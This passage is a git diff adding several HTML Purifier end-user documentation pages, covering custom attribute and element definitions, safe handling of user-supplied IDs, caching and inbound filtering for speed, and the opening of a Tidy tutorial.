+$config->set('HTML.DefinitionRev', 1); +$config->set('Cache.DefinitionImpl', null); // remove this later! +$def = $config->getHTMLDefinition(true); +<strong>$def->addAttribute('a', 'target', 'Enum#_blank,_self,_target,_top');</strong></pre> + +<p> + The <code>Enum#_blank,_self,_target,_top</code> does all the magic. + The string is split into two parts, separated by a hash mark (#): +</p> + +<ol> + <li>The first part is the name of what we call an <code>AttrDef</code></li> + <li>The second part is the parameter of the above-mentioned <code>AttrDef</code></li> +</ol> + +<p> + If that sounds vague and generic, it's because it is! HTML Purifier defines + an assortment of different attribute types one can use, and each of these + has their own specialized parameter format. Here are some of the more useful + ones: +</p> + +<table class="table"> + <thead> + <tr> + <th>Type</th> + <th>Format</th> + <th>Description</th> + </tr> + </thead> + <tbody> + <tr> + <th>Enum</th> + <td><em>[s:]</em>value1,value2,...</td> + <td> + Attribute with a number of valid values, one of which may be used. When + s: is present, the enumeration is case sensitive. + </td> + </tr> + <tr> + <th>Bool</th> + <td>attribute_name</td> + <td> + Boolean attribute, with only one valid value: the name + of the attribute. + </td> + </tr> + <tr> + <th>CDATA</th> + <td></td> + <td> + Attribute of arbitrary text. Can also be referred to as <strong>Text</strong> + (the specification makes a semantic distinction between the two). + </td> + </tr> + <tr> + <th>ID</th> + <td></td> + <td> + Attribute that specifies a unique ID + </td> + </tr> + <tr> + <th>Pixels</th> + <td></td> + <td> + Attribute that specifies an integer pixel length + </td> + </tr> + <tr> + <th>Length</th> + <td></td> + <td> + Attribute that specifies a pixel or percentage length + </td> + </tr> + <tr> + <th>NMTOKENS</th> + <td></td> + <td> + Attribute that specifies a number of name tokens, example: the + <code>class</code> attribute + </td> + </tr> + <tr> + <th>URI</th> + <td></td> + <td> + Attribute that specifies a URI, example: the <code>href</code> + attribute + </td> + </tr> + <tr> + <th>Number</th> + <td></td> + <td> + Attribute that specifies an positive integer number + </td> + </tr> + </tbody> +</table> + +<p> + For a complete list, consult + <a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/AttrTypes.php"><code>library/HTMLPurifier/AttrTypes.php</code></a>; + more information on attributes that accept parameters can be found on their + respective includes in + <a href="http://repo.or.cz/w/htmlpurifier.git?a=tree;hb=HEAD;f=library/HTMLPurifier/AttrDef"><code>library/HTMLPurifier/AttrDef</code></a>. +</p> + +<p> + Sometimes, the restrictive list in AttrTypes just doesn't cut it. Don't + sweat: you can also use a fully instantiated object as the value. The + equivalent, verbose form of the above example is: +</p> + +<pre>$config = HTMLPurifier_Config::createDefault(); +$config->set('HTML.DefinitionID', 'enduser-customize.html tutorial'); +$config->set('HTML.DefinitionRev', 1); +$config->set('Cache.DefinitionImpl', null); // remove this later! +$def = $config->getHTMLDefinition(true); +<strong>$def->addAttribute('a', 'target', new HTMLPurifier_AttrDef_Enum( + array('_blank','_self','_target','_top') +));</strong></pre> + +<p> + Trust me, you'll learn to love the shorthand. +</p> + +<h2>Add an element</h2> + +<p> + Adding attributes is really small-fry stuff, though, and it was possible + to add them (albeit a bit more wordy) prior to 2.0. The real gem of + the Advanced API is adding elements. There are five questions to + ask when adding a new element: +</p> + +<ol> + <li>What is the element's name?</li> + <li>What content set does this element belong to?</li> + <li>What are the allowed children of this element?</li> + <li>What attributes does the element allow that are general?</li> + <li>What attributes does the element allow that are specific to this element?</li> +</ol> + +<p> + It's a mouthful, and you'll be slightly lost if your not familiar with + the HTML specification, so let's explain them step by step. +</p> + +<h3>Content set</h3> + +<p> + The HTML specification defines two major content sets: Inline + and Block. Each of these + content sets contain a list of elements: Inline contains things like + <code>span</code> and <code>b</code> while Block contains things like + <code>div</code> and <code>blockquote</code>. +</p> + +<p> + These content sets amount to a macro mechanism for HTML definition. Most + elements in HTML are organized into one of these two sets, and most + elements in HTML allow elements from one of these sets. If we had + to write each element verbatim into each other element's allowed + children, we would have ridiculously large lists; instead we use + content sets to compactify the declaration. +</p> + +<p> + Practically speaking, there are several useful values you can use here: +</p> + +<table class="table"> + <thead> + <tr> + <th>Content set</th> + <th>Description</th> + </tr> + </thead> + <tbody> + <tr> + <th>Inline</th> + <td>Character level elements, text</td> + </tr> + <tr> + <th>Block</th> + <td>Block-like elements, like paragraphs and lists</td> + </tr> + <tr> + <th><em>false</em></th> + <td> + Any element that doesn't fit into the mold, for example <code>li</code> + or <code>tr</code> + </td> + </tr> + </tbody> +</table> + +<p> + By specifying a valid value here, all other elements that use that + content set will also allow your element, without you having to do + anything. If you specify <em>false</em>, you'll have to register + your element manually. +</p> + +<h3>Allowed children</h3> + +<p> + Allowed children defines the elements that this element can contain. + The allowed values may range from none to a complex regexp depending on + your element. +</p> + +<p> + If you've ever taken a look at the HTML DTD's before, you may have + noticed declarations like this: +</p> + +<pre><!ELEMENT LI - O (%flow;)* -- list item --></pre> + +<p> + The <code>(%flow;)*</code> indicates the allowed children of the + <code>li</code> tag: <code>li</code> allows any number of flow + elements as its children. (The <code>- O</code> allows the closing tag to be + omitted, though in XML this is not allowed.) In HTML Purifier, + we'd write it like <code>Flow</code> (here's where the content sets + we were discussing earlier come into play). There are three shorthand + content models you can specify: +</p> + +<table class="table"> + <thead> + <tr> + <th>Content model</th> + <th>Description</th> + </tr> + </thead> + <tbody> + <tr> + <th>Empty</th> + <td>No children allowed, like <code>br</code> or <code>hr</code></td> + </tr> + <tr> + <th>Inline</th> + <td>Any number of inline elements and text, like <code>span</code></td> + </tr> + <tr> + <th>Flow</th> + <td>Any number of inline elements, block elements and text, like <code>div</code></td> + </tr> + </tbody> +</table> + +<p> + This covers 90% of all the cases out there, but what about elements that + break the mold like <code>ul</code>? This guy requires at least one + child, and the only valid children for it are <code>li</code>. The + content model is: <code>Required: li</code>. There are two parts: the + first type determines what <code>ChildDef</code> will be used to validate + content models. The most common values are: +</p> + +<table class="table"> + <thead> + <tr> + <th>Type</th> + <th>Description</th> + </tr> + </thead> + <tbody> + <tr> + <th>Required</th> + <td>Children must be one or more of the valid elements</td> + </tr> + <tr> + <th>Optional</th> + <td>Children can be any number of the valid elements</td> + </tr> + <tr> + <th>Custom</th> + <td>Children must follow the DTD-style regex</td> + </tr> + </tbody> +</table> + +<p> + You can also implement your own <code>ChildDef</code>: this was done + for a few special cases in HTML Purifier such as <code>Chameleon</code> + (for <code>ins</code> and <code>del</code>), <code>StrictBlockquote</code> + and <code>Table</code>. +</p> + +<p> + The second part specifies either valid elements or a regular expression. + Valid elements are separated with horizontal bars (|), i.e. + "<code>a | b | c</code>". Use #PCDATA to represent plain text. + Regular expressions are based off of DTD's style: +</p> + +<ul> + <li>Parentheses () are used for grouping</li> + <li>Commas (,) separate elements that should come one after another</li> + <li>Horizontal bars (|) indicate one or the other elements should be used</li> + <li>Plus signs (+) are used for a one or more match</li> + <li>Asterisks (*) are used for a zero or more match</li> + <li>Question marks (?) are used for a zero or one match</li> +</ul> + +<p> + For example, "<code>a, b?, (c | d), e+, f*</code>" means "In this order, + one <code>a</code> element, at most one <code>b</code> element, + one <code>c</code> or <code>d</code> element (but not both), one or more + <code>e</code> elements, and any number of <code>f</code> elements." + Regex veterans should be able to jump right in, and those not so savvy + can always copy-paste W3C's content model definitions into HTML Purifier + and hope for the best. +</p> + +<p> + A word of warning: while the regex format is extremely flexible on + the developer's side, it is + quite unforgiving on the user's side. If the user input does not <em>exactly</em> + match the specification, the entire contents of the element will + be nuked. This is why there is are specific content model types like + Optional and Required: while they could be implemented as <code>Custom: + (valid | elements)*</code>, the custom classes contain special recovery + measures that make sure as much of the user's original content gets + through. HTML Purifier's core, as a rule, does not use Custom. +</p> + +<p> + One final note: you can also use Content Sets inside your valid elements + lists or regular expressions. In fact, the three shorthand content models + mentioned above are just that: abbreviations: +</p> + +<table class="table"> + <thead> + <tr> + <th>Content model</th> + <th>Implementation</th> + </tr> + </thead> + <tbody> + <tr> + <th>Inline</th> + <td>Optional: Inline | #PCDATA</td> + </tr> + <tr> + <th>Flow</th> + <td>Optional: Flow | #PCDATA</td> + </tr> + </tbody> +</table> + +<p> + When the definition is compiled, Inline will be replaced with a + horizontal-bar separated list of inline elements. Also, notice that + it does not contain text: you have to specify that yourself. +</p> + +<h3>Common attributes</h3> + +<p> + Congratulations: you have just gotten over the proverbial hump (Allowed + children). Common attributes is much simpler, and boils down to + one question: does your element have the <code>id</code>, <code>style</code>, + <code>class</code>, <code>title</code> and <code>lang</code> attributes? + If so, you'll want to specify the <code>Common</code> attribute collection, + which contains these five attributes that are found on almost every + HTML element in the specification. +</p> + +<p> + There are a few more collections, but they're really edge cases: +</p> + +<table class="table"> + <thead> + <tr> + <th>Collection</th> + <th>Attributes</th> + </tr> + </thead> + <tbody> + <tr> + <th>I18N</th> + <td><code>lang</code>, possibly <code>xml:lang</code></td> + </tr> + <tr> + <th>Core</th> + <td><code>style</code>, <code>class</code>, <code>id</code> and <code>title</code></td> + </tr> + </tbody> +</table> + +<p> + Common is a combination of the above-mentioned collections. +</p> + +<p class="aside"> + Readers familiar with the modularization may have noticed that the Core + attribute collection differs from that specified by the <a + href="http://www.w3.org/TR/xhtml-modularization/abstract_modules.html#s_commonatts">abstract + modules of the XHTML Modularization 1.1</a>. We believe this section + to be in error, as <code>br</code> permits the use of the <code>style</code> + attribute even though it uses the <code>Core</code> collection, and + the DTD and XML Schemas supplied by W3C support our interpretation. +</p> + +<h3>Attributes</h3> + +<p> + If you didn't read the <a href="#addAttribute">earlier section on + adding attributes</a>, read it now. The last parameter is simply + an array of attribute names to attribute implementations, in the exact + same format as <code>addAttribute()</code>. +</p> + +<h3>Putting it all together</h3> + +<p> + We're going to implement <code>form</code>. Before we embark, lets + grab a reference implementation from over at the + <a href="http://www.w3.org/TR/html4/sgml/loosedtd.html">transitional DTD</a>: +</p> + +<pre><!ELEMENT FORM - - (%flow;)* -(FORM) -- interactive form --> +<!ATTLIST FORM + %attrs; -- %coreattrs, %i18n, %events -- + action %URI; #REQUIRED -- server-side form handler -- + method (GET|POST) GET -- HTTP method used to submit the form-- + enctype %ContentType; "application/x-www-form-urlencoded" + accept %ContentTypes; #IMPLIED -- list of MIME types for file upload -- + name CDATA #IMPLIED -- name of form for scripting -- + onsubmit %Script; #IMPLIED -- the form was submitted -- + onreset %Script; #IMPLIED -- the form was reset -- + target %FrameTarget; #IMPLIED -- render in this frame -- + accept-charset %Charsets; #IMPLIED -- list of supported charsets -- + ></pre> + +<p> + Juicy! With just this, we can answer four of our five questions: +</p> + +<ol> + <li>What is the element's name? <strong>form</strong></li> + <li>What content set does this element belong to? <strong>Block</strong> + (this needs a little sleuthing, I find the easiest way is to search + the DTD for <code>FORM</code> and determine which set it is in.)</li> + <li>What are the allowed children of this element? <strong>One + or more flow elements, but no nested <code>form</code>s</strong></li> + <li>What attributes does the element allow that are general? <strong>Common</strong></li> + <li>What attributes does the element allow that are specific to this element? <strong>A whole bunch, see ATTLIST; + we're going to do the vital ones: <code>action</code>, <code>method</code> and <code>name</code></strong></li> +</ol> + +<p> + Time for some code: +</p> + +<pre>$config = HTMLPurifier_Config::createDefault(); +$config->set('HTML.DefinitionID', 'enduser-customize.html tutorial'); +$config->set('HTML.DefinitionRev', 1); +$config->set('Cache.DefinitionImpl', null); // remove this later! +$def = $config->getHTMLDefinition(true); +$def->addAttribute('a', 'target', new HTMLPurifier_AttrDef_Enum( + array('_blank','_self','_target','_top') +)); +<strong>$form = $def->addElement( + 'form', // name + 'Block', // content set + 'Flow', // allowed children + 'Common', // attribute collection + array( // attributes + 'action*' => 'URI', + 'method' => 'Enum#get|post', + 'name' => 'ID' + ) +); +$form->excludes = array('form' => true);</strong></pre> + +<p> + Each of the parameters corresponds to one of the questions we asked. + Notice that we added an asterisk to the end of the <code>action</code> + attribute to indicate that it is required. If someone specifies a + <code>form</code> without that attribute, the tag will be axed. + Also, the extra line at the end is a special extra declaration that + prevents forms from being nested within each other. +</p> + +<p> + And that's all there is to it! Implementing the rest of the form + module is left as an exercise to the user; to see more examples + check the <a href="http://repo.or.cz/w/htmlpurifier.git?a=tree;hb=HEAD;f=library/HTMLPurifier/HTMLModule"><code>library/HTMLPurifier/HTMLModule/</code></a> directory + in your local HTML Purifier installation. +</p> + +<h2>And beyond...</h2> + +<p> + Perceptive users may have realized that, to a certain extent, we + have simply re-implemented the facilities of XML Schema or the + Document Type Definition. What you are seeing here, however, is + not just an XML Schema or Document Type Definition: it is a fully + expressive method of specifying the definition of HTML that is + a portable superset of the capabilities of the two above-mentioned schema + languages. What makes HTMLDefinition so powerful is the fact that + if we don't have an implementation for a content model or an attribute + definition, you can supply it yourself by writing a PHP class. +</p> + +<p> + There are many facets of HTMLDefinition beyond the Advanced API I have + walked you through today. To find out more about these, you can + check out these source files: +</p> + +<ul> + <li><a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/HTMLModule.php"><code>library/HTMLPurifier/HTMLModule.php</code></a></li> + <li><a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ElementDef.php"><code>library/HTMLPurifier/ElementDef.php</code></a></li> +</ul> + +<h2 id="optimized">Notes for HTML Purifier 4.2.0 and earlier</h3> + +<p> + Previously, this tutorial gave some incorrect template code for + editing raw definitions, and that template code will now produce the + error <q>Due to a documentation error in previous version of HTML + Purifier...</q> Here is how to mechanically transform old-style + code into new-style code. +</p> + +<p> + First, identify all code that edits the raw definition object, and + put it together. Ensure none of this code must be run on every + request; if some sub-part needs to always be run, move it outside + this block. Here is an example below, with the raw definition + object code bolded. +</p> + +<pre>$config = HTMLPurifier_Config::createDefault(); +$config->set('HTML.DefinitionID', 'enduser-customize.html tutorial'); +$config->set('HTML.DefinitionRev', 1); +$def = $config->getHTMLDefinition(true); +<strong>$def->addAttribute('a', 'target', 'Enum#_blank,_self,_target,_top');</strong> +$purifier = new HTMLPurifier($config);</pre> + +<p> + Next, replace the raw definition retrieval with a + maybeGetRawHTMLDefinition method call inside an if conditional, and + place the editing code inside that if block. +</p> + +<pre>$config = HTMLPurifier_Config::createDefault(); +$config->set('HTML.DefinitionID', 'enduser-customize.html tutorial'); +$config->set('HTML.DefinitionRev', 1); +<strong>if ($def = $config->maybeGetRawHTMLDefinition()) { + $def->addAttribute('a', 'target', 'Enum#_blank,_self,_target,_top'); +}</strong> +$purifier = new HTMLPurifier($config);</pre> + +<p> + And you're done! Alternatively, if you're OK with not ever caching + your code, the following will still work and not emit warnings. +</p> + +<pre>$config = HTMLPurifier_Config::createDefault(); +$def = $config->getHTMLDefinition(true); +$def->addAttribute('a', 'target', 'Enum#_blank,_self,_target,_top'); +$purifier = new HTMLPurifier($config);</pre> + +<p> + A slightly less efficient version of this was what was going on with + old versions of HTML Purifier. +</p> + +<p> + <em>Technical notes:</em> ajh pointed out on <a + href="http://htmlpurifier.org/phorum/read.php?5,5164,5169#msg-5169">in a forum topic</a> that + HTML Purifier appeared to be repeatedly writing to the cache even + when a cache entry already existed. Investigation lead to the + discovery of the following infelicity: caching of customized + definitions didn't actually work! The problem was that even though + a cache file would be written out at the end of the process, there + was no way for HTML Purifier to say, <q>Actually, I've already got a + copy of your work, no need to reconfigure your + customizations</q>. This required the API to change: placing + all of the customizations to the raw definition object in a + conditional which could be skipped. +</p> + +</body></html> + +<!-- vim: et sw=4 sts=4 +--> diff --git a/lib/htmlpurifier/docs/enduser-id.html b/lib/htmlpurifier/docs/enduser-id.html new file mode 100644 index 000000000..53d2da248 --- /dev/null +++ b/lib/htmlpurifier/docs/enduser-id.html @@ -0,0 +1,148 @@ +<?xml version="1.0" encoding="UTF-8"?> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> +<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> +<meta name="description" content="Explains various methods for allowing IDs in documents safely in HTML Purifier." /> +<link rel="stylesheet" type="text/css" href="./style.css" /> + +<title>IDs - HTML Purifier</title> + +</head><body> + +<h1 class="subtitled">IDs</h1> +<div class="subtitle">What they are, why you should(n't) wear them, and how to deal with it</div> + +<div id="filing">Filed under End-User</div> +<div id="index">Return to the <a href="index.html">index</a>.</div> +<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> + +<p>Prior to HTML Purifier 1.2.0, this library blithely accepted user input that +looked like this:</p> + +<pre><a id="fragment">Anchor</a></pre> + +<p>...presenting an attractive vector for those that would destroy standards +compliance: simply set the ID to one that is already used elsewhere in the +document and voila: validation breaks. There was a half-hearted attempt to +prevent this by allowing users to blacklist IDs, but I suspect that no one +really bothered, and thus, with the release of 1.2.0, IDs are now <em>removed</em> +by default.</p> + +<p>IDs, however, are quite useful functionality to have, so if users start +complaining about broken anchors you'll probably want to turn them back on +with %Attr.EnableID. But before you go mucking around with the config +object, it's probably worth to take some precautions to keep your page +validating. Why?</p> + +<ol> + <li>Standards-compliant pages are good</li> + <li>Duplicated IDs interfere with anchors. If there are two id="foobar"s in a + document, which spot does a browser presented with the fragment #foobar go + to? Most browsers opt for the first appearing ID, making it impossible + to references the second section. Similarly, duplicated IDs can hijack + client-side scripting that relies on the IDs of elements.</li> +</ol> + +<p>You have (currently) four ways of dealing with the problem.</p> + + + +<h2 class="subtitled">Blacklisting IDs</h2> +<div class="subsubtitle">Good for pages with single content source and stable templates</div> + +<p>Keeping in terms with the +<acronym title="Keep It Simple, Stupid">KISS</acronym> principle, let us +deal with the most obvious solution: preventing users from using any IDs that +appear elsewhere on the document. The method is simple:</p> + +<pre>$config->set('Attr.EnableID', true); +$config->set('Attr.IDBlacklist' array( + 'list', 'of', 'attribute', 'values', 'that', 'are', 'forbidden' +));</pre> + +<p>That being said, there are some notable drawbacks. First of all, you have to +know precisely which IDs are being used by the HTML surrounding the user code. +This is easier said than done: quite often the page designer and the system +coder work separately, so the designer has to constantly be talking with the +coder whenever he decides to add a new anchor. Miss one and you open yourself +to possible standards-compliance issues.</p> + +<p>Furthermore, this position becomes untenable when a single web page must hold +multiple portions of user-submitted content. Since there's obviously no way +to find out before-hand what IDs users will use, the blacklist is helpless. +And since HTML Purifier validates each segment separately, perhaps doing +so at different times, it would be extremely difficult to dynamically update +the blacklist in between runs.</p> + +<p>Finally, simply destroying the ID is extremely un-userfriendly behavior: after +all, they might have simply specified a duplicate ID by accident.</p> + +<p>Thus, we get to our second method.</p> + + + +<h2 class="subtitled">Namespacing IDs</h2> +<div class="subsubtitle">Lazy developer's way, but needs user education</div> + +<p>This method, too, is quite simple: add a prefix to all user IDs. With this +code:</p> + +<pre>$config->set('Attr.EnableID', true); +$config->set('Attr.IDPrefix', 'user_');</pre> + +<p>...this:</p> + +<pre><a id="foobar">Anchor!</a></pre> + +<p>...turns into:</p> + +<pre><a id="user_foobar">Anchor!</a></pre> + +<p>As long as you don't have any IDs that start with user_, collisions are +guaranteed not to happen. The drawback is obvious: if a user submits +id="foobar", they probably expect to be able to reference their page with +#foobar. You'll have to tell them, "No, that doesn't work, you have to add +user_ to the beginning."</p> + +<p>And yes, things get hairier. Even with a nice prefix, we still have done +nothing about multiple HTML Purifier outputs on one page. Thus, we have +a second configuration value to piggy-back off of: %Attr.IDPrefixLocal:</p> + +<pre>$config->set('Attr.IDPrefixLocal', 'comment' . $id . '_');</pre> + +<p>This new attributes does nothing but append on to regular IDPrefix, but is +special in that it is volatile: it's value is determined at run-time and +cannot possibly be cordoned into, say, a .ini config file. As for what to +put into the directive, is up to you, but I would recommend the ID number +the text has been assigned in the database. Whatever you pick, however, it +has to be unique and stable for the text you are validating. Note, however, +that we require that %Attr.IDPrefix be set before you use this directive.</p> + +<p>And also remember: the user has to know what this prefix is too!</p> + + + +<h2>Abstinence</h2> + +<p>You may not want to bother. That's okay too, just don't enable IDs.</p> + +<p>Personally, I would take this road whenever user-submitted content would be +possibly be shown together on one page. Why a blog comment would need to use +anchors is beyond me.</p> + + + +<h2>Denial</h2> + +<p>To revert back to pre-1.2.0 behavior, simply:</p> + +<pre>$config->set('Attr.EnableID', true);</pre> + +<p>Don't come crying to me when your page mysteriously stops validating, though.</p> + +</body> +</html> + +<!-- vim: et sw=4 sts=4 +--> diff --git a/lib/htmlpurifier/docs/enduser-overview.txt b/lib/htmlpurifier/docs/enduser-overview.txt new file mode 100644 index 000000000..fe7f8705d --- /dev/null +++ b/lib/htmlpurifier/docs/enduser-overview.txt @@ -0,0 +1,59 @@ + +HTML Purifier + by Edward Z. Yang + +There are a number of ad hoc HTML filtering solutions out there on the web +(some examples including HTML_Safe, kses and SafeHtmlChecker.class.php) that +claim to filter HTML properly, preventing malicious JavaScript and layout +breaking HTML from getting through the parser. None of them, however, +demonstrates a thorough knowledge of neither the DTD that defines the HTML +nor the caveats of HTML that cannot be expressed by a DTD. Configurable +filters (such as kses or PHP's built-in striptags() function) have trouble +validating the contents of attributes and can be subject to security attacks +due to poor configuration. Other filters take the naive approach of +blacklisting known threats and tags, failing to account for the introduction +of new technologies, new tags, new attributes or quirky browser behavior. + +However, HTML Purifier takes a different approach, one that doesn't use +specification-ignorant regexes or narrow blacklists. HTML Purifier will +decompose the whole document into tokens, and rigorously process the tokens by: +removing non-whitelisted elements, transforming bad practice tags like <font> +into <span>, properly checking the nesting of tags and their children and +validating all attributes according to their RFCs. + +To my knowledge, there is nothing like this on the web yet. Not even MediaWiki, +which allows an amazingly diverse mix of HTML and wikitext in its documents, +gets all the nesting quirks right. Existing solutions hope that no JavaScript +will slip through, but either do not attempt to ensure that the resulting +output is valid XHTML or send the HTML through a draconic XML parser (and yet +still get the nesting wrong: SafeHtmlChecker.class.php does not prevent <a> +tags from being nested within each other). + +This document no longer is a detailed description of how HTMLPurifier works, +as those descriptions have been moved to the appropriate code. The first +draft was drawn up after two rough code sketches and the implementation of a +forgiving lexer. You may also be interested in the unit tests located in the +tests/ folder, which provide a living document on how exactly the filter deals +with malformed input. + +In summary (see corresponding classes for more details): + +1. Parse document into an array of tag and text tokens (Lexer) +2. Remove all elements not on whitelist and transform certain other elements + into acceptable forms (i.e. <font>) +3. Make document well formed while helpfully taking into account certain quirks, + such as the fact that <p> tags traditionally are closed by other block-level + elements. +4. Run through all nodes and check children for proper order (especially + important for tables). +5. Validate attributes according to more restrictive definitions based on the + RFCs. +6. Translate back into a string. (Generator) + +HTML Purifier is best suited for documents that require a rich array of +HTML tags. Things like blog comments are, in all likelihood, most appropriately +written in an extremely restrictive set of markup that doesn't require +all this functionality (or not written in HTML at all), although this may +be changing in the future with the addition of levels of filtering. + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/docs/enduser-security.txt b/lib/htmlpurifier/docs/enduser-security.txt new file mode 100644 index 000000000..518f092bd --- /dev/null +++ b/lib/htmlpurifier/docs/enduser-security.txt @@ -0,0 +1,18 @@ + +Security + +Like anything that claims to afford security, HTML_Purifier can be circumvented +through negligence of people. This class will do its job: no more, no less, +and it's up to you to provide it the proper information and proper context +to be effective. Things to remember: + +1. Character Encoding: see enduser-utf8.html for more info. + +2. IDs: see enduser-id.html for more info + +3. URIs: see enduser-uri-filter.html + +4. CSS: document pending +Explain which CSS styles we blocked and why. + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/docs/enduser-slow.html b/lib/htmlpurifier/docs/enduser-slow.html new file mode 100644 index 000000000..f0ea02de1 --- /dev/null +++ b/lib/htmlpurifier/docs/enduser-slow.html @@ -0,0 +1,120 @@ +<?xml version="1.0" encoding="UTF-8"?> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> +<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> +<meta name="description" content="Explains how to speed up HTML Purifier through caching or inbound filtering." /> +<link rel="stylesheet" type="text/css" href="./style.css" /> + +<title>Speeding up HTML Purifier - HTML Purifier</title> + +</head><body> + +<h1 class="subtitled">Speeding up HTML Purifier</h1> +<div class="subtitle">...also known as the HELP ME LIBRARY IS TOO SLOW MY PAGE TAKE TOO LONG page</div> + +<div id="filing">Filed under End-User</div> +<div id="index">Return to the <a href="index.html">index</a>.</div> +<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> + +<p>HTML Purifier is a very powerful library. But with power comes great +responsibility, in the form of longer execution times. Remember, this +library isn't lightly grazing over submitted HTML: it's deconstructing +the whole thing, rigorously checking the parts, and then putting it back +together. </p> + +<p>So, if it so turns out that HTML Purifier is kinda too slow for outbound +filtering, you've got a few options: </p> + +<h2>Inbound filtering</h2> + +<p>Perform filtering of HTML when it's submitted by the user. Since the +user is already submitting something, an extra half a second tacked on +to the load time probably isn't going to be that huge of a problem. +Then, displaying the content is a simple a manner of outputting it +directly from your database/filesystem. The trouble with this method is +that your user loses the original text, and when doing edits, will be +handling the filtered text. While this may be a good thing, especially +if you're using a WYSIWYG editor, it can also result in data-loss if a +user makes a typo. </p> + +<p>Example (non-functional):</p> + +<pre><?php + /** + * FORM SUBMISSION PAGE + * display_error($message) : displays nice error page with message + * display_success() : displays a nice success page + * display_form() : displays the HTML submission form + * database_insert($html) : inserts data into database as new row + */ + if (!empty($_POST)) { + require_once '/path/to/library/HTMLPurifier.auto.php'; + require_once 'HTMLPurifier.func.php'; + $dirty_html = isset($_POST['html']) ? $_POST['html'] : false; + if (!$dirty_html) { + display_error('You must write some HTML!'); + } + $html = HTMLPurifier($dirty_html); + database_insert($html); + display_success(); + // notice that $dirty_html is *not* saved + } else { + display_form(); + } +?></pre> + +<h2>Caching the filtered output</h2> + +<p>Accept the submitted text and put it unaltered into the database, but +then also generate a filtered version and stash that in the database. +Serve the filtered version to readers, and the unaltered version to +editors. If need be, you can invalidate the cache and have the cached +filtered version be regenerated on the first page view. Pros? Full data +retention. Cons? It's more complicated, and opens other editors up to +XSS if they are using a WYSIWYG editor (to fix that, they'd have to be +able to get their hands on the *really* original text served in +plaintext mode). </p> + +<p>Example (non-functional):</p> + +<pre><?php + /** + * VIEW PAGE + * display_error($message) : displays nice error page with message + * cache_get($id) : retrieves HTML from fast cache (db or file) + * cache_insert($id, $html) : inserts good HTML into cache system + * database_get($id) : retrieves raw HTML from database + */ + $id = isset($_GET['id']) ? (int) $_GET['id'] : false; + if (!$id) { + display_error('Must specify ID.'); + exit; + } + $html = cache_get($id); // filesystem or database + if ($html === false) { + // cache didn't have the HTML, generate it + $raw_html = database_get($id); + require_once '/path/to/library/HTMLPurifier.auto.php'; + require_once 'HTMLPurifier.func.php'; + $html = HTMLPurifier($raw_html); + cache_insert($id, $html); + } + echo $html; +?></pre> + +<h2>Summary</h2> + +<p>In short, inbound filtering is the simple option and caching is the +robust option (albeit with bigger storage requirements). </p> + +<p>There is a third option, independent of the two we've discussed: profile +and optimize HTMLPurifier yourself. Be sure to report back your results +if you decide to do that! Especially if you port HTML Purifier to C++. +<tt>;-)</tt></p> + +</body> +</html> + +<!-- vim: et sw=4 sts=4 +--> diff --git a/lib/htmlpurifier/docs/enduser-tidy.html b/lib/htmlpurifier/docs/enduser-tidy.html new file mode 100644 index 000000000..a243f7fc2 --- /dev/null +++ b/lib/htmlpurifier/docs/enduser-tidy.html @@ -0,0 +1,231 @@ +<?xml version="1.0" encoding="UTF-8"?> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> +<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> +<meta name="description" content="Tutorial for tweaking HTML Purifier's Tidy-like behavior." /> +<link rel="stylesheet" type="text/css" href="style.css" /> + +<title>Tidy - HTML Purifier</title> + +</head><body> + +<h1>Tidy</h1> + +<div id="filing">Filed under Development</div> +<div id="index">Return to the <a href="index.html">index</a>.</div> +<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> + +<p>You've probably heard of HTML Tidy, Dave Raggett's little piece +of software that cleans up poorly written HTML. Let me say it straight +out:</p> + +<p class="emphasis">This ain't HTML Tidy!</p> + +<p>Rather, Tidy stands for a cool set of Tidy-inspired features in HTML Purifier +that allows users to submit deprecated elements and attributes and get +valid strict markup back. For example:</p> + +<pre><center>Centered</center></pre> + +<p>...becomes:</p> + +<pre><div style="text-align:center;">Centered</div></pre> + +<p>...when this particular fix is run on the HTML. This tutorial will give +you the lowdown of what exactly HTML Purifier will do when Tidy +is on, and how to fine-tune this behavior. Once again, <strong>you do +not need Tidy installed on your PHP to use these features!</strong></p> + +<h2>What does it do?</h2> + +<p>Tidy will do several things to your HTML:</p> + +<ul> + <li>Convert deprecated elements and attributes to standards-compliant + alternatives</li> + <li>Enforce XHTML compatibility guidelines and other best practices</li> + <li>Preserve data that would normally be removed as per W3C</li> +</ul> + +<h2>What are levels?</h2> + +<p>Levels describe how aggressive the Tidy module should be when +cleaning up HTML. There are four levels to pick: none, light, medium +and heavy. Each of these levels has a well-defined set of behavior +associated with it, although it may change depending on your doctype.</p> + +<dl> + <dt>light</dt> + <dd>This is the <strong>lenient</strong> level. If a tag or attribute + is about to be removed because it isn't supported by the + doctype, Tidy will step in and change into an alternative that + is supported.</dd> + <dt>medium</dt> + <dd>This is the <strong>correctional</strong> level. At this level, + all the functions of light are performed, as well as some extra, + non-essential best practices enforcement. Changes made on this + level are very benign and are unlikely to cause problems.</dd> + <dt>heavy</dt> + <dd>This is the <strong>aggressive</strong> level. If a tag or + attribute is deprecated, it will be converted into a non-deprecated + version, no ifs ands or buts.</dd> +</dl> + +<p>By default, 